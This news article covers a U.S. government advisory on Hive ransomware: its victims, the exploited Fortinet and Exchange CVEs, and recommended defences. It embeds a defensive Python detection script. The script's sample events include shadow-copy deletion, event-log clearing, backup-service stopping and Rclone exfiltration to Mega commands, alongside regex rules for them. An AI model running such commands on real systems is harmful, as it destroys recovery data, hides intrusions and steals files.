The Hive ransomware has racked up hundreds of critical infrastructure victims, especially healthcare and public health organizations, through phishing emails and the exploitation of known Fortinet and Microsoft Exchange vulnerabilities, according to a new U.S. government cybersecurity advisory.
In the advisory, the FBI, CISA and the Department of Health and Human Services (HHS) said that Hive ransomware actors have victimized over 1,300 companies globally and have received approximately $100 million in ransom payments as of November 2022. Since its discovery in June 2021, Hive has rapidly expanded its reach and has also evolved quickly, as seen in a new variant observed in February that switched from the Go programming language to Rust.
“Hive ransomware follows the ransomware-as-a-service (RaaS) model in which developers create, maintain, and update the malware, and affiliates conduct the ransomware attacks,” according to the Thursday advisory. “From June 2021 through at least November 2022, threat actors have used Hive ransomware to target a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH).”
Because the affiliates deploying Hive rely on differing TTPs, the method of initial access varies from intrusion to intrusion. Most often, though, the agencies have observed Hive delivered through phishing emails, exploitation of known vulnerabilities, and exposed, external-facing remote services such as Remote Desktop Protocol (RDP) and virtual private networks (VPN). In some instances the actors have exploited a known, critical improper authentication flaw in Fortinet's FortiOS SSL VPN (CVE-2020-12812), which can allow a user to log in without completing the second authentication factor. Hive actors have also exploited a trio of Microsoft Exchange vulnerabilities known collectively as ProxyShell: a security feature bypass (CVE-2021-31207), a remote code execution bug (CVE-2021-34473) and a privilege escalation issue (CVE-2021-34523).
Hive actors have carried out several defense-evasion and anti-forensic steps after gaining initial access to victim systems, including terminating processes related to backups and antivirus, deleting all volume shadow copies so that files cannot be restored locally, and clearing Windows event logs.
“Hive actors exfiltrate data likely using a combination of Rclone and the cloud storage service Mega.nz,” the advisory said. “In addition to its capabilities against the Microsoft Windows operating system, Hive ransomware has known variants for Linux, VMware ESXi, and FreeBSD.”
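The behaviors in the two paragraphs above (deleting shadow copies, clearing event logs, stopping backup and antivirus services, and pushing data to Mega with Rclone) all leave traces in process-creation telemetry, and a small rule set over command lines is enough to surface them. The Python below is an added example written for this page, not code from the advisory or from any vendor tool; the event records are constructed by hand in the shape of Sysmon Event ID 1 / Security 4688 fields, and the host names, user names and rule patterns are assumptions for illustration. It also ranks hosts by how many distinct techniques fired, since one hit can be an admin's housekeeping while several within minutes is the pre-encryption pattern the advisory describes.

```python
import re
from collections import defaultdict

# Constructed sample process-creation records (Sysmon Event ID 1 / Security 4688
# style). These are hand-written for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"ts": "2022-11-17T02:14:03Z", "host": "WS-104", "user": "CORP\\jdoe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2022-11-17T02:14:05Z", "host": "WS-104", "user": "CORP\\jdoe",
     "cmdline": "wmic.exe shadowcopy delete"},
    {"ts": "2022-11-17T02:14:09Z", "host": "WS-104", "user": "CORP\\jdoe",
     "cmdline": "wevtutil.exe cl Security"},
    {"ts": "2022-11-17T02:14:10Z", "host": "WS-104", "user": "CORP\\jdoe",
     "cmdline": "wevtutil.exe cl System"},
    {"ts": "2022-11-17T02:15:30Z", "host": "WS-104", "user": "CORP\\jdoe",
     "cmdline": "net stop VeeamBackupSvc /y"},
    {"ts": "2022-11-17T01:58:00Z", "host": "FS-01", "user": "CORP\\svc_backup",
     "cmdline": "rclone.exe copy D:\\Shares\\Finance mega:exfil --transfers 8"},
    # Benign look-alikes: querying a log and listing shadow copies are routine.
    {"ts": "2022-11-17T08:00:00Z", "host": "WS-221", "user": "CORP\\asmith",
     "cmdline": "wevtutil.exe qe Application /c:5"},
    {"ts": "2022-11-17T08:01:00Z", "host": "WS-221", "user": "CORP\\asmith",
     "cmdline": "vssadmin.exe list shadows"},
]

# Assumed detection patterns, one per behavior named in the advisory. Each is
# deliberately narrow (delete, not list; cl, not qe) to keep admin noise down.
RULES = {
    "shadow_copy_deletion": re.compile(
        r"\b(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)", re.I),
    "event_log_clearing": re.compile(
        r"\bwevtutil(\.exe)?\s+(cl|clear-log)\s+(security|system|application)\b", re.I),
    "backup_or_av_service_stop": re.compile(
        r"\b(net1?\s+stop|sc(\.exe)?\s+stop|taskkill(\.exe)?\s+.*?/im)\s+"
        r"\S*(veeam|backup|vss|sql|msmpeng|defender)", re.I),
    "rclone_exfil_to_cloud": re.compile(
        r"\brclone(\.exe)?\s+(copy|sync|move)\b.*\bmega:", re.I),
}


def match_event(event):
    """Return the names of every rule whose pattern matches the event's command line."""
    cmd = event.get("cmdline", "")
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def detect(events):
    """Run all rules over a list of events and return one alert per (event, rule) hit."""
    alerts = []
    for ev in events:
        for name in match_event(ev):
            alerts.append({"rule": name, "host": ev["host"], "user": ev["user"],
                           "ts": ev["ts"], "cmdline": ev["cmdline"]})
    return alerts


def rank_hosts(alerts):
    """Group alerts by host and order hosts by how many distinct techniques fired.

    Breadth matters more than volume here: shadow copy deletion plus log
    clearing plus a backup service stop on one machine is the impair-defenses
    sequence that precedes encryption, whereas a lone hit is often housekeeping.
    Returns a list of (host, sorted rule names), most suspicious first.
    """
    by_host = defaultdict(set)
    for a in alerts:
        by_host[a["host"]].add(a["rule"])
    return sorted(((host, sorted(rules)) for host, rules in by_host.items()),
                  key=lambda hr: (-len(hr[1]), hr[0]))


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for a in hits:
        print(f'{a["ts"]} {a["host"]:<7} {a["rule"]:<26} {a["cmdline"]}')
    print()
    for host, rules in rank_hosts(hits):
        print(f"{host}: {len(rules)} distinct technique(s): {', '.join(rules)}")
```

In a real deployment the same rules would run against Security 4688 (with command-line auditing enabled) or Sysmon Event ID 1 from a SIEM; the point of the host ranking is that the individual commands are legitimate administrative tools, so correlation across techniques, not any single match, is what separates an intrusion from routine maintenance.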
Hive isn’t the only ransomware group to close in on the healthcare sector, which faces distinctive security pressures because disruptions directly affect patient care and because of the volume of sensitive personal data involved. The FBI, CISA and HHS also recently warned of a cybercrime group called Daixin Team that has launched ransomware attacks against the healthcare and public health sector since at least June.
In a recent striking example of the impact of cyberattacks on the healthcare sector, systems at CommonSpirit Health, the second-largest non-profit hospital chain in the U.S., were pushed offline after a ransomware attack in early October, causing delays in surgeries and patient care. Government officials during the Aspen Institute Cyber Summit this week pointed to the CommonSpirit Health ransomware attack as an example of ransomware currently being at “unacceptable levels,” despite efforts by both the private and public sectors to help companies with their resilience and go after ransomware syndicates through increased law enforcement activity.
“We’ve only seen the [ransomware] problem get worse,” said Paul Abbate, deputy director with the FBI, during the Aspen Institute Cyber Summit. “It’s a highly profitable enterprise for criminal organizations to go after. We’ve seen a higher volume of ransomware attacks and the financial losses are only increasing as well. We’re going to have to come even closer together in preventing victims from being harmed.”
The FBI, CISA and HHS recommended that healthcare organizations take several measures to protect against ransomware attacks, including remediating known flaws (particularly the ones previously exploited by Hive), requiring multi-factor authentication and strong passwords, closing any unused ports and removing any application “not deemed necessary for day-to-day operations.”